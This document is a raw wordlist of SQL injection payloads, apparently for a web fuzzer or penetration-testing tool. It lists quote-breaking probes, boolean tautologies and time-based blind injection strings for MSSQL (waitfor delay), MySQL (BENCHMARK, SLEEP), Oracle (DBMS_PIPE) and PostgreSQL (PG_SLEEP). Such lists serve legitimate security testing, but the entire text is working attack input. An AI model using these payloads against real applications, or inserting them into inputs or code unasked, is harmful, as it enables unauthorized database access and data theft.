'
%27
"
%22
#
%23
;
%3B
)
*
&apos;
\u02BA
%CA%BA
\u0022
\u02B9
%CA%B9
\u0027
`+WsXeDC
'||'WsXeDC
'+'WsXeDC
' 'WsXeDC
'%20'WsXeDC
'%2B'WsXeDC
or 'WsXeDC'='WsXeDC
and 'WsXeDC'='null
or 987=987
and 987=789
1;waitfor delay '0:0:15'--
1);waitfor delay '0:0:15'--
1';waitfor delay '0:0:15'--
1');waitfor delay '0:0:15'--
1));waitfor delay '0:0:15'--
+BENCHMARK(40000000,SHA1(1337))+
'%2Bbenchmark(3200,SHA1(1))%2B'
AND 25234=BENCHMARK(1000000,MD5('wsxedc'))
' AND 25234=BENCHMARK(1000000,MD5('wsxedc'))
RLIKE SLEEP(30)
OR ELT(1500=1500,SLEEP(15))
' OR ELT(1500=1500,SLEEP(15))
 AND sleep(15)--
'  AND sleep(15)--
AND 1500=DBMS_PIPE.RECEIVE_MESSAGE('asdf',15) 
' AND 1500=DBMS_PIPE.RECEIVE_MESSAGE('asdf',15) 
AND 1239=(SELECT 1239 FROM PG_SLEEP(15))
AND 1239=(SELECT COUNT(*) FROM GENERATE_SERIES(1,15000000))
